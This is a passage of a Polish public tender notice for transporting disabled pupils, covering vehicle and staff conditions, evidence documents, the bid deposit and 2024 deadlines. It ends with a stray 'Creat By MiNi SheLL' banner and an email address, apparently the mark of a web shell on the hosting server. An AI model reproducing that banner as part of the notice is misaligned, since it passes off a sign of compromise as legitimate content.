załączeniem dokumentu potwierdzającego, że ta usługa została wykonana lub jest<br/>wykonywana należycie;<br/>2) Warunek w zakresie potencjału technicznego:<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum sprzętowym do realizacji<br/>zamówienia tj. minimum 2 samochodami specjalistycznymi przystosowanymi do przewozu osób niepełnosprawnych, które<br/>winny posiadać sprzęt ułatwiający wsiadanie i wysiadanie dziecku poruszającemu się na wózku inwalidzkim w postaci: wind<br/>lub najazdów teleskopowych z powłoką antypoślizgową umożliwiającą wprowadzanie wózków do pojazdu oraz odpowiednie<br/>zabezpieczenie dla przewozu dzieci i wózków oraz pasy bezpieczeństwa biodrowo – barkowe do przypinania dzieci<br/>znajdujących się na wózkach. Pojazdy oferowane do przewozu uczniów muszą być odpowiednio oznakowane i nie starsze<br/>niż 6 lat (wyprodukowane nie wcześniej niż w 2018 r.) Pojazdy oferowane do przewozu uczniów muszą posiadać:<br/>a) aktualne badanie techniczne,<br/>b) opłacone polisy ubezpieczeniowe pojazdu OC i NNW.<br/>3) Warunek dotyczący osób skierowanych do realizacji zamówienia:<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania<br/>niniejszego zamówienia, posiadających uprawnienia w specjalności:<br/>a) kierowca, minimum 2 osoby – prawo jazdy, świadectwo kwalifikacji zawodowych lub inne dokumenty potwierdzające<br/>kwalifikacje zgodnie z ustawą z dnia 6 września 2001 r.<br/>o transporcie drogowym,<br/>b) opiekun, minimum 2 osoby – kurs pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokumenty dot. wykazania<br/>braku podstaw do wykluczenia z udziału w postępowaniu:<br/>1) Poniższe dokumenty i oświadczenie składają:<br/>- Wykonawca składający ofertę samodzielnie,<br/>- Wykonawcy składający ofertę wspólnie, przy czym każdy z nich składa odrębnie poniższe dokumenty i oświadczenia,<br/>a) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej- załącznik nr 4 do SWZ.<br/>b) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, (załącznik nr<br/>10 do SWZ) w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego SWZ, zgodnie z § 3<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z 3 sierpnia 2023 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.U. 2023 poz. 1824).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z art. 274 ust. 1 Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia,<br/>następujących podmiotowych środków dowodowych:<br/>1. dokumenty dot. potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>1) licencja (zezwolenia) do wykonywania na terenie Polski transportu drogowego osób, zgodnie<br/>z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz z ustawą z dnia 20 czerwca 1997 r. – Prawo o ruchu<br/>drogowym (t.j. Dz. U. z 2023 r. poz. 1047 z późn. zm.),<br/>2) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór wykazu usług stanowi załącznik nr 5<br/>do SWZ;<br/>3) wykaz sprzętu dostępnego Wykonawcy w celu realizacji zamówienia wraz z informacją<br/>o podstawie dysponowania tymi zasobami (zgodny z wykazem wskazanym w ofercie) -<br/>z wykorzystaniem wzoru określonego w załączniku nr 6 do SWZ. Do każdego wykazu należy dołączyć kserokopie dowodów<br/>rejestracyjnych pojazdów (potwierdzone za zgodność<br/>z oryginałem). Zamawiający zastrzega sobie przeprowadzenie wizji w celu sprawdzenia prawdziwości złożenia<br/>oświadczenia przed podpisaniem umowy i w trakcie realizacji zamówienia. W przypadku zmiany w trakcie realizacji<br/>zamówienia pojazdu wskazanego w wykazie pojazd ten musi być równoważny (z tą samą lub większą liczbą miejsc i nie<br/>starszy) do wskazanego w ofercie.<br/>4) wykaz osób (kierowców i opiekunów), które będą uczestniczyć w wykonywaniu zamówienia,<br/>w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich uprawnień, kwalifikacji<br/>zawodowych i doświadczenia niezbędnych dla wykonania zamówienia,<br/>a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie dysponowania tymi osobami z<br/>wykorzystaniem wzoru określonego w załączniku nr 7 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium na pełny okres związania ofertą na kwotę/wartość w<br/>wysokości 2 000,00 zł (słownie złotych: dwa tysiące 00/100)<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz. 419).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:<br/>35 1020 2629 0000 9202 0349 3269, tytułem: Wadium w postępowaniu nr SCO.2611.4.2024<br/>6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w formie elektronicznej (kwalifikowany podpis elektroniczny). Z treści gwarancji lub poręczeń,<br/>musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie Zamawiającego, zobowiązanie gwaranta do<br/>zapłaty na rzecz Zamawiającego kwoty określonej w gwarancji lub poręczeniu.<br/>8. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które przed upływem terminu składania ofert<br/>znajdzie się na rachunku Zamawiającego. W przypadku poręczenia lub gwarancji wadium składa się środkiem komunikacji<br/>elektronicznej. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na<br/>Platformę.<br/>9. Zasady zwrotu oraz okoliczności zatrzymania wadium określa ustawa Pzp.<br/>10. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wadium (w każdej z dopuszczalnych<br/>form) może być wniesione przez jednego, kilku lub wszystkich Wykonawców, pod warunkiem, że łączna wysokość<br/>wniesionego wadium odpowiadać będzie wymaganej kwocie. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz<br/>z ofertą stosowne pełnomocnictwo (nie dotyczy spółki cywilnej, o ile upoważnienie/ pełnomocnictwo do występowania w<br/>imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę).<br/>3) Pełnomocnictwo, o którym mowa wyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5) Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem.<br/>6) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego zostanie wybrana,<br/>Zamawiający zastrzega możliwość żądania przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>7) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>8) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są dołączyć do oferty oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy (wg załącznika nr 9 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 Pzp oraz we wskazanym we Wzorze Umowy, stanowiącym załącznik nr 3 do SWZ. Złożenie oferty jest<br/>jednoznaczne z akceptacją przez Wykonawcę projektowanych postanowień umowy. Zmiana umowy wymaga dla swej<br/>ważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wloszczowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-10 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawcom, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może<br/>ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy, przysługują środki ochrony prawnej na zasadach przewidzianych w dziale IX ustawy Pzp (art. 505–590).<br/>2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia oraz dokumentów<br/>zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 ustawy Pzp, oraz<br/>Rzecznikowi Małych i Średnich Przedsiębiorców.

Creat By MiNi SheLL
Email: jattceo@gmail.com